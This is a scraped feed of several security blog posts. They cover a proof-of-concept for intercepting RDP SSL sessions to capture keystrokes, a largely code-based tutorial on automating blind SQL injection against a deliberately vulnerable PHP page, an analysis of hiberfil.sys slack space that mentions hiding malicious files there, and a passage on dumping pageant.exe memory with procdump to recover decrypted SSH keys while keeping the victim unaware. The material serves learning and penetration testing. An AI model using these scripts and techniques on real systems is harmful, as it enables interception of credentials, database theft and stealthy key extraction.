Quantcast
Channel: general – DiabloHorn
Viewing all 34 articles
Browse latest View live

Quick POC to mitm RDP ssl

$
0
0

So the other day I stumbled upon this great article from Portcullis Labs. The article explains how you can man-in-the-middle an RDP SSL connection. This can be helpful in obtaining the user’s password, like Portcullis explains in their article. As far as I could tell they didn’t release their tool, so I decided to see if I could whip up a quick POC script with a twist of saving the entire decrypted stream to a pcap file. This would put you in the position to maybe retrieve more sensitive data then just the password. Turns out the only modification from regular SSL intercepting code is more or less the following:

    #read client rdp data
    serversock.sendall(clientsock.recv(19))
    #read server rdp data and check if ssl
    temp = serversock.recv(19)
    clientsock.sendall(temp)
    if(temp[15] == '\x01'):

Like you can see we just pass through the initial packet and then just check the response packet for the ‘SSL’ byte before we start intercepting. The output is pretty boring, since everything is saved to the file ‘output.pcap’:

sudo ./rdps2rdp_pcap.py 
waiting for connection...
('...connected from:', ('10.50.0.123', 1044))
waiting for connection...
Intercepting rdp session from 10.50.0.123
some error happend
some error happend

You can ignore the errors, that’s just me being lazy for this POC. The output is saved in ‘output.pcap’ which you can then open with wireshark or further process to extract all the key strokes. If you want to play around with the POC you can find it on my github as usual. If you plan on extracting the key strokes make sure you look for the key scan codes and not for the hex representation of the character that the victim typed. In case you are wondering, yes , extracting the key strokes is left as an excersise for the user :)

 


Filed under: general, security Tagged: mitm, pcap, rdp, scapy

Writing your own blind SQLi script

$
0
0

We all know that sqlmap is a really great tool which has a lot of options that you can tweak and adjust to exploit the SQLi vuln you just found (or that sqlmap found for you). On rare occasions however you might want to just have a small and simple script or you just want to learn how to do it yourself. So let’s see how you could write your own script to exploit a blind SQLi vulnerability. Just to make sure we are all on the same page, here is the blind SQLi definition from OWASP:

Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response.

You can also roughly divide the exploiting techniques in two categories (like owasp does) namely:

  • content based
    • The page output tells you if the query was successful or not
  • time based
    • Based on a time delay you can determine if your query was successful or not

Of course you have dozens of variations on the above two techniques, I wrote about one such variation a while ago. For this script we are going to just focus on the basics of the mentioned techniques, if you are more interested in knowing how to find SQLi vulnerabilities you could read my article on Solving RogueCoder’s SQLi challenge. Since we are only focusing on automating a blind sql injection, we will not be building functionality to find SQL injections.

Before we even think about sending SQL queries to the servers, let’s first setup the vulnerable environment and try to be a bit realistic about it. Normally this means that you at least have to login, keep your session and then inject. In some cases you might even have to take into account CSRF tokens which depending on the implementation, means you have to parse some HTML before you can send the request. This will however be out of scope for this blog entry. If you want to know how you could parse HTML with python you could take a look at my credential scavenger entry.

If you just want the scripts you can find them in the example_bsqli_scripts repository on my github, since this is an entry on how you could write your own scripts all the values are hard coded in the script.

The vulnerable environment

Since we are doing this for learning purposes anyways, let’s create almost everything from scratch:

  • sudo apt-get install mysql-server mysql-client
  • sudo apt-get install php5-mysql
  • sudo apt-get install apache2 libapache2-mod-php5

Now let’s write some vulnerable code and abuse the mysql database and it’s tables for our vulnerable script, which saves us the trouble of creating a test database.

pwnme-plain.php

<?php

$username = "root";
$password = "root";

$link = mysql_connect('localhost',$username,$password);

if(!$link){
    die(mysql_error());
}

if(!mysql_select_db("mysql",$link)){
    die(mysql_error());
}

$result = mysql_query("select user,host from user where user='" . $_GET['name'] . "'",$link);

echo "<html><body>";
if(mysql_num_rows($result) > 0){
    echo "User exists<br/>";
}else{
    echo "User does not exist<br/>";
}

if($_GET['debug'] === "1"){
    while ($row = mysql_fetch_assoc($result)){
        echo $row['user'] . ":" . $row['host'] . "<br/>";
    }
}
echo "</html></body>";
mysql_free_result($result);
mysql_close($link);
?>

Like you can see if you give it a valid username it will say the user exists and if you don’t give it a valid username it will tell you the user doesn’t exist. If you need more information you can append a debug flag to get actual output. You probably also spotted the SQL injection which you can for example exploit like this:

http://localhost/pwnme-plain.php?name=x' union select 1,2--+

Which results in the output:

User exists

and if you mess up the query or the query doesn’t return any row it will result in:

User does not exist

Sending and receiving data

We are going to use the python package requests for this. If you haven’t heard it yet, it makes working with http stuff even easier than urllib2. If you happen to encounter weird errors with the requests library you might want to install the library yourself instead of using the one provided by your distro.

To make a request using GET and getting the page content you’d use:

print requests.get("http://localhost/pwnme-plain.php").text

If you want to pass in parameters you’d do it like:

urlparams = {'name':'root'}
print requests.get("http://localhost/pwnme-plain.php",parameters=urlparams).text

Which ensures that the parameters are automatically encoded.

To make a request using POST you’d use:

postdata = {'user':'webuser','pass':'webpass'}
print requests.post("http://localhost/pwnme-login.php",data=postdata).text

That’s all you need to start sending your SQLi payload and receiving the response.

Content based automation

For content based automation you basically need a query which will change the content based on the output of the query. You can do this in a lot of ways, here are two example:

  • display or don’t display content
    • id=1 and 1=if(substring((select @@version),1,1)=5,1,2)
  • display content based on the query output
    • id=1 + substring((select @@version),1,1)

For our automation script we will choose the first way of automating it, since it depends less on the available content. The first thing you need is a “universal” query which you use as the base to execute all your other queries. In our case this could be:

root’ and 1=if(({PLACEHOLDER})=PLACEHOLDERVAR,1,2)–+

With the above query we can decide what we want to display. If you want display the wrong content we have to replace the PLACEHOLDER text and PLACEHOLDERVAR with something that will make the ‘if clause’ to choose ‘2’, for example:

root’ and 1=if(substring((select @@version),1,1)=20,1,2)–+

Since there is no mysql version 20 this will lead to a query that ends up being evaluated as:

root’ and 1=2

Which results in a False result, thus displaying the wrong content, in our case ‘User does not exist’. If on the other hand we want the query to display the good content we can just change it to:

root’ and 1=if(substring((select @@version),1,1)=5,1,2)–+

Which of course will end up as:

root’ and 1=1

Thus resulting in True and displaying the good content ‘User exists’. When writing your own automation script you have to somehow strike the balance between a quick and dirty script to get you the desired result and a somewhat reusable script. For this blog entry we are going to hard code several things into the script (since we are not really reusing them), one of them being the base query. The first function in our script is thus a function that sends the query to the server and checks for the good content, this can be as simple as:

BASE_URL = "http://localhost/pwnme-plain.php"
SUCCESS_TEXT = "user exists"
URL_PARAMS = {'name':None}

def get_query_result(data):
    global URL_PARAMS

    URL_PARAMS['name'] = data
    pagecontent = requests.get(BASE_URL, params=URL_PARAMS).text
    if SUCCESS_TEXT in pagecontent.lower():
        return True
    else:
        return False

At this point we know how to send data to the server and we know our base query, the next thing we need, is something to determine the result of our query. One of the basic building block can be the substring function as you’ve seen in the code snippets before. The easy way is then to compare every byte with a range of bytes to see if it matches. We however are going to choose a slightly more difficult solution and use a binary search, since it’s way faster than trying each possible byte. If you are not familiar with a binary search read up on it here. So the bulk of our script is contained in the following function:

BASE_QUERY = "root' and 1=if(({}){}{},1,2)-- "

def binsearch(query,sl,sh):
    searchlow = sl
    searchhigh = sh
    searchmid = 0
    while True:
        searchmid = (searchlow + searchhigh) / 2
        if get_query_result(BASE_QUERY.format(query, "=", searchmid)):
            break
        elif get_query_result(BASE_QUERY.format(query, ">", searchmid)):
            searchlow = searchmid + 1
        elif get_query_result(BASE_QUERY.format(query, "<", searchmid)):
            searchhigh = searchmid
    return searchmid

The only thing left to do now is to carefully choose our ‘wrapper’ functions that will receive our desired SQL statement to be executed within the injection:

def querylength(query):
    return binsearch("length(({}))".format(query),0,100)

def execquery(query):
    fulltext = ""
    qlen = querylength(query) + 1
    print "Retrieving {} bytes".format(qlen-1)
    for i in range(1,qlen):
        sys.stdout.write(chr(binsearch("ord(substring(({}),{},1))".format(query,i),0,127)))
    print ""

Since we chose a base query that only handles numbers in it’s comparison it will work fine for a SQL query which returns a number. If the query however returns a character we need to wrap that query with ord() to make sure it also only returns numbers. If you put this all together and fix it to accept the query as a parameter then your script input/output will look like this:

 ./ebs-content.py “select @@version”
Retrieving 23 bytes
5.5.38-0ubuntu0.12.04.1

That’s it for automating a blind SQL injection using a content based technique. You could also use fuzzy hashing with a reasonable threshold instead of hard coding the good content response.

Time based automation

The concept for time based exploitation is basically the same as for content based, except that you rely on time discrepancies to determine the TRUE/FALSE portion of your query result. Since it’s time based it automatically means it will also be slower than content based, thus forcing us to be as efficient as possible. For this we are going to make sure that every request counts by reading out a byte on a bit by bit basis. This is one of the more common techniques and it more or less guarantees that you can ready any bytes with eight connections. It can of course still fail if the connection or the server becomes unstable for some reason and forces you to repeat the request. The essence of the technique consists of testing each bit to see if it’s 1 or 0 and based on the answer rebuild the byte. There are a lot of different ways to do this, we are going to choose the following one:

select if(substring(bin(ascii(substring((select @@version),1,1))),sleep(10),0)=TRUE,3,4)

Like you can see, the query tests a specific bit and returns the result. Depending if it’s 1 (TRUE) or 0 (FALSE) we either sleep for a period of time or we return immediately. That wasn’t so hard now was it? You can now just walk through the eight bits and check if they are set or not. Except it won’t work, check this out:

mysql> select bin(substring((select @@version),1,1));
+—————————————-+
| bin(substring((select @@version),1,1)) |
+—————————————-+
| 101 |
+—————————————-+
1 row in set (0.00 sec)

Hmmm shouldn’t the result be a full byte? Seems like the output is truncated by the bin() function. MySQL provides a function to fix it known as lpad(), let’s try that again:

mysql> select lpad(bin(substring((select @@version),1,1)),8,’0′);
+—————————————————-+
| lpad(bin(substring((select @@version),1,1)),8,’0′) |
+—————————————————-+
| 00000101 |
+—————————————————-+
1 row in set (0.00 sec)

Now that looks much better since it actually has 8 bits. So after this little hick up let’s focus on the needed function, for example we need a function to measure what the time is to execute a normal query. How else would we determine how long the sleep() delay should be? After all we don’t want to wait weeks for the output of a single character. The function looks like this:

def get_timing():
    times = list()
    print "Calculating average times"
    for i in range(10):
        URL_PARAMS['name'] = 'root'
        r = requests.get(BASE_URL,params=URL_PARAMS)
        times.append(r.elapsed.seconds)
        time.sleep(randint(1,3))
        print r.elapsed.seconds
    print "Average: %s" % (sum(times) / len(times))
    return (sum(times) / len(times))

We could improve the function by also keeping track of the slowest response, but for now this will do. Have you noticed anything interesting? The requests library takes care of measuring the request timing, without it we’d had to wrap the request in our own time measuring function. You might be wondering why I have a random delay after each request, for some odd reason I thought that could help to make the measurement more realistic, not sure if it actually works so feel free to remove it. We also need to convert the sleep() delay into meaningful bits and eventually a full byte, we’ll do that with the following function:

def getbyte(query):
    bytestring = ""
    for i in range(1,9):
        if get_query_result(BASE_QUERY.format(query,i)):
            bytestring += "1"
        else:
            bytestring += "0"
    return int(bytestring,2)

That looks pretty doable right, eventually you’ll end up with a string of bits (eight total) which you then convert to a byte. The last function that we need is the one that performs the request and determines if the bit was set or not, which looks like this:

def get_query_result(data):
    global URL_PARAMS
    reqtime = 0

    URL_PARAMS['name'] = data
    r = requests.get(BASE_URL, params=URL_PARAMS)
    reqtime = r.elapsed.seconds
    pagecontent = r.text
    if reqtime > BASE_TIME:
        return True
    else:
        return False

You might notice that I used the ‘r.elapsed.seconds’, if you want more precision you could combine it with ‘r.elapsed.microseconds’. Basically that’s it, you can then reuse most of the ‘content based automation’ the only big changes are the queries and some for loops, here’s the basic query:

BASE_QUERY = “root’ and 1=if(substring({},{},1)=TRUE,sleep(1),2)– “

The most important part of the base query is to get the timing right, since it should be slower than the base request but not so slow as to take an eternity to complete. To get the output length of  let’s say “select @@version” you’d use a function like this:

def querylength(query):
    return getbyte("lpad(bin(length(({}))),8,'0')".format(query))

and to get the actual content of “select @@version” you’d use a function like this:

def execquery(query):
    fulltext = ""
    qlen = querylength(query) + 1
    print "Retrieving {} bytes".format(qlen-1)
    for i in range(1,qlen):
        sys.stdout.write(chr(getbyte("lpad(bin(ascii(substring(({}),{},1))),8,'0')".format(query,i))))
        sys.stdout.flush()
    print ""

This is it for the time based automation, like you can see it’s really similar to the content based automation except that you determine the True/False response based on time instead of basing it on some content that is returned by the page.

Wrapping automation with login support

Since we are using the requests library this is pretty easy, all you need to do is wrap the original request in a Session object. The rest of the complicated session handling is performed by the requests library, you can even find the example on their website. First however let’s upgrade our PHP script with some kind of login logic:

pwnme-login.php

<?php
/*
    DiabloHorn https://diablohorn.wordpress.com
*/
$username = "root";
$password = "root";

$link = mysql_connect('localhost',$username,$password);

if(!$link){
    die(mysql_error());
}

if(!mysql_select_db("mysql",$link)){
    die(mysql_error());
}

session_start();

if($_SERVER["REQUEST_METHOD"] == "POST"){
    if($_POST['user'] === "webuser" && $_POST['pass'] === "webpass"){
        $_SESSION['login'] = "ok";
        echo "login OK";
    }
}
if($_SESSION['login'] === "ok"){
    $result = mysql_query("select user,host from user where user='" . $_GET['name'] . "'",$link);

    echo "<html><body>";
    if(mysql_num_rows($result) > 0){
        echo "User exists<br/>";
    }else{
        echo "User does not exist<br/>";
    }

    if($_GET['debug'] === "1"){
        while ($row = mysql_fetch_assoc($result)){
            echo $row['user'] . ":" . $row['host'] . "<br/>";
        }
    }
    echo "</html></body>";
    mysql_free_result($result);
}else{
    echo "please login first";
}

mysql_close($link);
?>

if you used the previous scripts that we made, they won’t work on the above PHP, since we need to login or in other words we need to send the received session id back to the server. So let’s add that to our script:

URL_SESSION = requests.Session()

def do_login():
    global URL_SESSION

    postdata = {'user':'webuser','pass':'webpass'}
    #we assume the login will work
    print URL_SESSION.post("http://localhost/pwnme-login.php",data=postdata).text

The only thing you have to do now is to make sure that the “get_query_result()” function uses the URL_SESSION object instead of the “requests” object and don’t forget to actually call the do_login() function before calling the execquery() function.

Conclusion

Hope you enjoyed this blog entry and that you found it useful to know how to write your own blind SQLi automation scripts. You will probably almost never need them since sqlmap is pretty versatile, but I’ve found myself in situations where I needed my own quick and dirty scripts to get the job done. You could always build upon these scripts and implement a CSRF capable script yourself.

References


Filed under: general, security Tagged: blind injection, python, sql injection, sqli

Parsing the hiberfil.sys, searching for slack space

$
0
0

Implementing functionality that is already available in an available tool is something that has always taught me a lot, thus I keep on doing it when I encounter something I want to fully understand. In this case it concerns the ‘hiberfil.sys’ file on Windows. As usual I first stumbled upon the issue and started writing scripts to later find out someone had written a nice article about it, which you can read here (1). For the sake of completeness I’m going to repeat some of the information in that article and hopefully expand upon it, I mean it’d be nice if I could use this entry as a reference page in the future for when I stumble again upon hibernation files. Our goal for today is going to be to answer the following question:

What’s a hiberfil.sys file, does it have slack space and if so how do we find and analyze it?

To answer that question will hopefully be answered in the following paragraphs; we are going to look at the hibernation process, hibernation file, it’s file format structure, how to interpret it and finally analyze the found slack space. As usual you can skip the post and go directly to the code.

Hibernation process

When you put your computer to ‘sleep’ there are actually several ways in which it can be performed by the operating  system one of those being the hibernation one. The hibernation process puts the contents of your memory into the hiberfil.sys file so that the state of all your running applications is preserved. By default when you enable hibernation the hiberfil.sys is created and filled with zeros. To enable hibernation you can run the following command in an elevated command shell:

powercfg.exe -H on

If you want to also control the size you can do:

powercfg.exe -H -Size 100

An interesting fact to note is that Windows 7 sets the size of the hibernation file size to 75% of your memory size by default. According to Microsoft documentation (2) this means that hibernation process could fail if it’s not able to compress the memory contents to fit in the hibernation file. This of course is useful information since it indicates that the contest of the hibernation file is compressed which usually will make basic analysis like ‘strings’ pretty useless.

if you use strings always go for ‘strings -a <inputfile>’ read this post if you are wondering why.

The hibernation file usually resides in the root directory of the system drive, but it’s not fixed. If an administrators wants to change the location he can do so by editing the following registry key as explained by this (3) msdn article:

Key Name: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\
Value Name: PagingFiles
Type: REG_MULT_SZ
Data: C:\pagefile.sys 150 500
In the Data field, change the path and file name of the pagefile, along with the minimum and maximum file size values (in megabytes).

So if you are performing an incident response or forensic investigation make sure you check this registry key before you draw any conclusion if the hiberfil.sys file is absent from it’s default location. Same goes for creating memory images using hibernation, make sure you get the 100% and write it to a location which doesn’t destroy evidence or where the evidence has already been collected.

Where does the slack space come from you might ask? That’s an interesting question since you would assume that each time the computer goes into hibernation mode it would create a new hiberfil.sys file, but it doesn’t. Instead it will overwrite the current file with the contents it wants to save. This is what causes slack space, since if the new data is smaller in size than the already available files the data at the end of the file will still be available even if it’s not referenced by the new headers written to the file.

From a forensic standpoint that’s pretty interesting since the unreferenced but available data might contain important information to help the investigation along. If you are working with tools that automatically import / parse or analyse the hiberfil.sys file you should check / ask / test how they handle slack space. In a best case scenario they will inform you about the slack space and try to recover the information, in a less ideal scenario they will inform you that there is slack space but it’s not able to handle the data and in the worst case scenario it will just silently ignore that data and tell you the hibernation file has been processed successfully.

Hibernation File structure

Now that we know that slack space exists how do we find and process it? First of all we should start with identifying the file format to be able to parse it, which unfortunately isn’t available from Microsoft directly. Luckily for us we don’t need to reverse it (yet?) since there are pretty smart people out there who have already done so. You could read this or this or this to get some very good information about the file format. Let’s look at the parts that are relevant for our purpose of retrieving and analyzing the hibernation slack space. The general overview of the file format is as follow:

hiberfil_file_format

Hibernation File Format (9)

Like you can see in the image above the file format seems reasonably easy to parse if we have the definition of all the headers. The most important headers for us are the “Hibernation File Header” which starts at page zero, the “Memory Table” header which contains a pointer to the next one and the amount of Xpress blocks and the “Xpress image” header which contains the actual memory data.  The last two are the headers actually create the chain we want to follow to be able to distinguish between referenced Xpress blocks and blocks which are just lingering around in slack space. The thing to keep in mind is that even though the “Hibernation File Header” contains a lot of interesting information to make a robust tool, it might not be present when we recover a hibernation file. The reason for this is that when Windows resumes from hibernation the first page is zeroed. Luckily it isn’t really needed if you just assume a few constants like page size being 4096 bytes and finding the first Xpress block with a bit of searching around. Let’s have a look at the headers we have been talking about:

typedef struct
{
ULONG Signature;
ULONG Version;
ULONG CheckSum;
ULONG LengthSelf;
ULONG PageSelf;
UINT32 PageSize;
ULONG64 SystemTime;
ULONG64 InterruptTime;
DWORD FeatureFlags;
DWORD HiberFlags;
ULONG NoHiberPtes;
ULONG HiberVa;
ULONG64 HiberPte;
ULONG NoFreePages;
ULONG FreeMapCheck;
ULONG WakeCheck;
UINT32 TotalPages;
ULONG FirstTablePage;
ULONG LastFilePage;
PO_HIBER_PREF PerfInfo;
ULONG NoBootLoaderLogPages;
ULONG BootLoaderLogPages[8];
ULONG TotalPhysicalMemoryCount;
} PO_MEMORY_IMAGE, *PPO_MEMORY_IMAGE;

The FirstTablePage member is the most important one for us since it contains a pointer to the first memory table. Then again, knowing that the first page might be wiped out, do we really want to parse it when it’s available? Let’s look at the memory table structure:

struct MEMORY_TABLE
{
DWORD PointerSystemTable;
UINT32 NextTablePage;
DWORD CheckSum;
UINT32 EntryCount;
MEMORY_TABLE_ENTRY MemoryTableEntries[EntryCount];
};

That’s neat as already expected it contains the NextTablePage member which points to the next memory table. Directly following the memory table we’ll find the Xpress block which have the following header:

struct IMAGE_XPRESS_HEADER
{
CHAR Signature[8] = 81h, 81h, "xpress";
BYTE UncompressedPages = 15;
UINT32 CompressedSize;
BYTE Reserved[19] = 0;
};

It seems this header contains the missing puzzle pieces, since it tells us how big each Xpress block is. So if you followed along, here is the big picture on how it all fits in to be parsed and discover if there is any slack space and if so how much.

  • Find the first MemoryTable
  • Follow pointers until you find the last one
  • Follow all the xpress blocks until the last one
  • Calculate distance from the end of the last block until the end of the file
  • Slack space found

There are a few caveats that we need to be aware of (you know this if you already read the references):

  • Every OS version might change the structures and thus their size
  • Everything is page aligned
  • Every memory table entry should correspond to an Xpress block
  • The get the actual compressed size calculate as follow:
    • CompressedSize / 4 + 1 and round it up to 8

Parsing and interpreting the hibernation file

The theory sounds pretty straight forward right? The practice however actually made me waste some hours. For one I was assuming the “Hibernation File Header” to be the same across all operating systems, stupid I know. Just didn’t realize it until I was brainstorming with Mitchel Sahertian about why the pointers where not pointing at the correct offsets. This however taught me that when you are writing some proof of concept code you should parse the entire structure, not just reference the structure members you are interested in. Since when you parse the entire structure it gives you more context and the ability to quickly spot that a lot of members contain garbage data. When you are just directly referencing a single member like I was doing, you loose the context and you only get to see one pointer which could virtually be anything. So even after learning this lesson, I still decided to implement the script by just parsing the minimum needed data, even though I used full structures while debugging the code. The most important snippets of the script are highlighted hereafter, the script probably contains bugs although in the few tests I’ve performed it seems to work fine:

Finding the first MemoryTable, first we search for an xpress block and then we subtract a full page from it.

    firstxpressblock = fmm.find(XPRESS_SIG)
    print "Found Xpress block @ 0x%x" % firstxpressblock
    firstmemtableoffset = firstxpressblock - PAGE_SIZE

Finding the pointer to the next MemoryTable in a dynamic way, we want to avoid reversing this structure for every new operating system version or service pack. We start at the beginning of the MemoryTable and force-interpret every four bytes as a pointer, then we check the pointer destination. The pointer destination is checked by verifying that an xpress block follows it immediately, if so it’s valid.

def verify_memorytable_offset(offset):
    """
        Verify the table pointer to be valid
        valid table pointer should have an Xpress block
        on the next page
    """
    fmm.seek(offset+PAGE_SIZE)
    correct = False
    if fmm.read(8) == XPRESS_SIG:
        correct = True
    fmm.seek(offset)
    return correct

#could go horribly wrong, seems to work though
def find_memorytable_nexttable_offset(data):
    """
        Dynamically find the NextTablePage pointer
        Verification based on verify_memorytable_offset function
    """
    for i in range(len(data)):
        toffset = unpack('<I',data[i:(i+4)])[0]*PAGE_SIZE
        if verify_memorytable_offset(toffset):
            return i

After we find the last MemoryTable, we just have to walk all the xpress blocks until the last xpress block and from it’s end till the end of the file we found the slack space:

    while True:
        xsize = xpressblock_size(fmm,nxpress)
        fmm.seek(xsize,1)
        xh = fmm.read(8)
        if xh != XPRESS_SIG:
            break
        fmm.seek(-8,1)
        if VERBOSE:
            print "Xpress block @ 0x%x" % nxpress
        nxpress = fmm.tell()
    print "Last Xpress block @ 0x%x" % nxpress

Analyzing the found hibernation slack space

So after all this how do we even know this slack space is really here and can we even extract something useful from it? First of all let’s compare our output to that of volatility, after all it’s the de facto, and in my opinion best, memory analysis tool out there. One of the things you can for example do with volatility is convert the hibernation file into a raw memory file, volatility doesn’t support direct hibernation file analysis. Before converting it however I added two debug lines to the file ‘volatility/plugins/addrspaces/hibernate.py’

Printing the memory table offset:

NextTable = MemoryArray.MemArrayLink.NextTable.v()
print "memtableoff %x" % NextTable

# This entry count (EntryCount) should probably be calculated

Printing the xpress block offset:

XpressHeader = obj.Object("_IMAGE_XPRESS_HEADER", XpressHeaderOffset, self.base)
XpressBlockSize = self.get_xpress_block_size(XpressHeader)
print "xpressoff %x" % XpressHeaderOffset
return XpressHeader, XpressBlockSize

With this small modification I’m able to compare the output of my script to the output of volatility:

Volatility output:

 ./vol.py -f ~/p/find_hib_slack/hibfiles/a.sys –profile=Win7SP0x86 imagecopy -O ~/p/find_hib_slack/hibfiles/raw.a.img

[…]

memtableoff 10146
xpressoff 10147000
xpressoff 1014f770
xpressoff 101589f0
xpressoff 10160240
xpressoff 10166a98
xpressoff 1016c7a8
xpressoff 10172448
xpressoff 10179b60
xpressoff 1017ff50
xpressoff 10181af8
xpressoff 10181d58
xpressoff 10183790
xpressoff 101877e0
xpressoff 1018c290
xpressoff 10192270
xpressoff 10195890
xpressoff 1019b680
xpressoff 101a0d50
xpressoff 101a5258
xpressoff 101a8608
xpressoff 101aa3e8
xpressoff 101adc70
xpressoff 101b2de0

That looks pretty clear, the last memory table is at offset 0x10146 and the last xpress block is at offset 0x101b2de0

My script:

./find_hib_slack.py hibfiles/a.sys

Last MemoryTable @ 0x10146000
Xpress block @ 0x10147000
Xpress block @ 0x1014f770
Xpress block @ 0x101589f0
Xpress block @ 0x10160240
Xpress block @ 0x10166a98
Xpress block @ 0x1016c7a8
Xpress block @ 0x10172448
Xpress block @ 0x10179b60
Xpress block @ 0x1017ff50
Xpress block @ 0x10181af8
Xpress block @ 0x10181d58
Xpress block @ 0x10183790
Xpress block @ 0x101877e0
Xpress block @ 0x1018c290
Xpress block @ 0x10192270
Xpress block @ 0x10195890
Xpress block @ 0x1019b680
Xpress block @ 0x101a0d50
Xpress block @ 0x101a5258
Xpress block @ 0x101a8608
Xpress block @ 0x101aa3e8
Xpress block @ 0x101adc70
Last Xpress block @ 0x101b2de0
Start of slack space @ 270223752
Total file size 1073209344
Slackspace size 765 megs

At least we know that the parsing seems to be ok, since our last MemoryTable offset and our last xpress offset match the ones from volatility. We can also see that the end of the last xpress block is way before the end of the file. This indicates that the space in between might contain some interesting data. From a memory forensic perspective it’s logical that volatility doesn’t parse this since the chances of being able to extract any meaningful structured data from it are reduced in comparison with a normal memory image or hibernation file. You can use the output to carve out the slack space with dd if you want to further analyze it, for example like this:

dd if=<inputfile> of=<slack.img> bs=1 skip=<start_of_slackspace>

The thing is, like with all slack space it can contain virtually anything. If you are really lucky you’ll find nice new MemoryTables and xpress blocks. If you are less lucky you’ll only find partial xpress blocks. For now I’ve opted for medium optimism and assumed we’ll at least be able to find full xpress blocks. So I wrote another scripts which you can use to extract and decompress blocks from a blob of data and write it to a file. After this you can try your luck with strings for example or volatility plugins yarascan or psscan. Here is some example output:

./bulk_xpress_decompress.py hibfiles/a.sys 270223752

Advancing to offset 270223752
Xpress block @ 0x101b65c0 size: 20824
Xpress block @ 0x101bb718 size: 17760
Xpress block @ 0x101bfc78 size: 17240
Xpress block @ 0x101c3fd0 size: 20424
Xpress block @ 0x101c8f98 size: 21072
Xpress block @ 0x101ce1e8 size: 16712

The script also writes all the decompressed output to a file called ‘decompressed.slack’. I use the decompression file from volatility, hope I didn’t mess up any license requirements, since I just included it in it’s entirety.

Conclusion

Sometimes you really have to dive into a file format to fully understand it, it won’t always end in glorious victory, but you’ll learn a lot during the development of your own script. Also the slack space is a nice place to store your malicious file. I’m taking a guess here, but I assume that if you enlarge the hibernation file, Windows will be fine with it. As long as the incident response or forensic investigator doesn’t look at it you’ll be fine with it and get away without your stash being discovered due to the fact that most tools ignore the slack space.

References

  1. http://digital-forensics.sans.org/blog/2014/07/01/hibernation-slack-unallocated-data-from-the-deep-past
  2. http://download.microsoft.com/download/7/E/7/7E7662CF-CBEA-470B-A97E-CE7CE0D98DC2/HiberFootprint.docx
  3. http://msdn.microsoft.com/en-us/library/ms912851(v=winembedded.5).aspx
    • Change hibernation file location
  4. http://msdn.microsoft.com/en-us/library/windows/desktop/aa373229(v=vs.85).aspx
    • System power states
  5. http://lcamtuf.blogspot.nl/2014/10/psa-dont-run-strings-on-untrusted-files.html
  6. http://msdn.moonsols.com/
  7. http://www.blackhat.com/presentations/bh-usa-08/Suiche/BH_US_08_Suiche_Windows_hibernation.pdf
  8. http://sandman.msuiche.net/docs/SandMan_Project.pdf
  9. http://stoned-vienna.com/downloads/Hibernation%20File%20Attack/Hibernation%20File%20Format.pdf
  10. http://stoned-vienna.com/html/index.php?page=hibernation-file-attack
  11. https://github.com/volatilityfoundation

Filed under: general Tagged: hiberfil.sys, hibernation, python, slack space, volatility

Discovering the secrets of a pageant minidump

$
0
0

A Red Team exercise is lotsa fun not only because you have a more realistic engagement due to the broader scope, but also because you can encounter situations which you normally wouldn’t on a regular narrow scoped penetration test. I’m going to focus on pageant which Slurpgeit recently encountered during one of these red team exercises which peeked my interest.

Apparantly he got access to a machine on which the user used pageant to manage ssh keys and authenticate to servers without having to type his key password every single time he connects. This of course raises the following interesting (or silly) question:

Why does the user only have to type his ssh key in once?

Which has a rather logical (or doh) answer as well:

The pageant process keeps the decrypted key in memory so that you can use them without having to type the decryption password every time you want to use the key.

From an attackers perspective it of course begs the question if you can steal these unencrypted keys? Assuming you are able to make a memory dump of the running process you should be able to get these decrypted ssh keys. During this blog post I’ll be focusing on how you could achieve this and the pitfalls I encountered when approaching this.

Creating the process memory dump

First of all we need a memory dump, to create one we will use the excellent ‘ProcDump.exe‘ utility from the sysinternals tools. This of course has the added benefit that normally it doesn’t trigger any anti virus alarm bells, if you’ve configured your hips correctly it might trigger some alarm bells. The following command should do the trick to create a full process memory dump:

C:\>procdump.exe -ma pageant.exe
ProcDump v7.1 - Writes process dump files
Copyright (C) 2009-2014 Mark Russinovich
Sysinternals - www.sysinternals.com
With contributions from Andrew Richards
[03:56:37] Dump 1 initiated: C:\pageant.exe_150902_035637.dmp
[03:56:37] Dump 1 writing: Estimated dump file size is 84 MB.
[03:56:39] Dump 1 complete: 84 MB written in 1.7 seconds
[03:56:39] Dump count reached.

This should, as can be seen, create a full dump (‘.dmp’) file which you can then use for analysis. The full part (-ma) is important or you won’t be able to extract the juicy bits later on. If you are doing this during a red team exercise like Slurpgeit was doing, don’t forget to add the ‘-accepteula’ argument or your victim will have all kinds of popups. Another nice habit is to always(=as often as possible) make process memory dumps from processes and grabbing the binaries. You should of course be aware that this might cause the process to crash, but sometimes the risk is worth it.

The unlucky shots

I first tried the ‘non parsing’ approach which just involved searching around for RSA key finding tools and letting them loose on the dump file. This however did not result in any usable keys, this could partially be due to my impatience of wanting to extract the unencrypted private keys which of course resulted in also using tools which are not really meant to be used on this kind of memory dump formats. The following is a list of tools / scripts that I (attempted to) tried:

At first I thought this might have to do with possible fragmentation of the memory regions in the dump format, but after learning more about the format this wasn’t really the issue in my dump.

The good thing about me not succeeding with the above mentioned tools is the fact that it pushed me to wanting to learn and understand the format of the process memory dump file produced by ‘procdump.exe’. The bad thing is that it’s become a more lengthy post then at first expected :)

Getting to know the format

I then decided that I needed to understand the minidump format, which to my surprise seems to be mostly documented by Microsoft. A good starting point to understand this format would be the blog post by @moyix, which provides a great library to parse the mindump format as well.

In it’s most basic form the minidump format contains a header from which you can start to parse the dump file:

typedef struct _MINIDUMP_HEADER {
  ULONG32 Signature;
  ULONG32 Version;
  ULONG32 NumberOfStreams;
  RVA     StreamDirectoryRva;
  ULONG32 CheckSum;
  union {
    ULONG32 Reserved;
    ULONG32 TimeDateStamp;
  };
  ULONG64 Flags;
} MINIDUMP_HEADER, *PMINIDUMP_HEADER;

This header points to an array of stream directory entries which further describe the type and location of each stream:

typedef struct _MINIDUMP_DIRECTORY {
  ULONG32                      StreamType;
  MINIDUMP_LOCATION_DESCRIPTOR Location;
} MINIDUMP_DIRECTORY, *PMINIDUMP_DIRECTORY;

typedef struct _MINIDUMP_LOCATION_DESCRIPTOR {
  ULONG32 DataSize;
  RVA     Rva;
} MINIDUMP_LOCATION_DESCRIPTOR;

This is where at first I got a little bit confused since I started to parse the wrong stream type. I choose to parse and investigate the ‘MemoryInfoListStream’ stream type since I assumed that would contain the raw memory regions that hold the juicy info. Turned out it didn’t contain the raw memory regions, it just contained a description of memory regions and their access rights etc.

